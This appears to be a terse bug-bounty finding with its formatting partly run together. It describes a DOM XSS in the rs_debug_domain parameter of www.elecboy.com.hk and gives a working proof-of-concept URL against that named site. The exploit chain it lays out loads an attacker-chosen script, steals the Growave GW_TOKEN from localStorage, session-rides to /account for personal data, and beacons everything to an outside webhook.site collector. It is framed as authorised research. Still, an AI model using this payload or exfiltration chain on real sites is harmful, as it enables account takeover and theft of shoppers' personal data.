rs_debug_domain DOM XSS → ATOAuthorized security research only. A.S. Watson / Intigriti, scope *.elecboy.com.hk.
?rs_debug=script&rs_debug_domain=… from the URL.<script src="https://<domain>/resultpage.js?shop=…"> — no admin check, no allowlist.resultpage.js executes as www.elecboy.com.hk, reads the Growave GW_TOKEN from localStorage, session-rides to /account for victim PII, and beacons everything to your webhook.site collector.https://www.elecboy.com.hk/?rs_debug=script&rs_debug_domain=httpbin.org%2Fbase64%2FYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ%3D%3D%3Fx%3D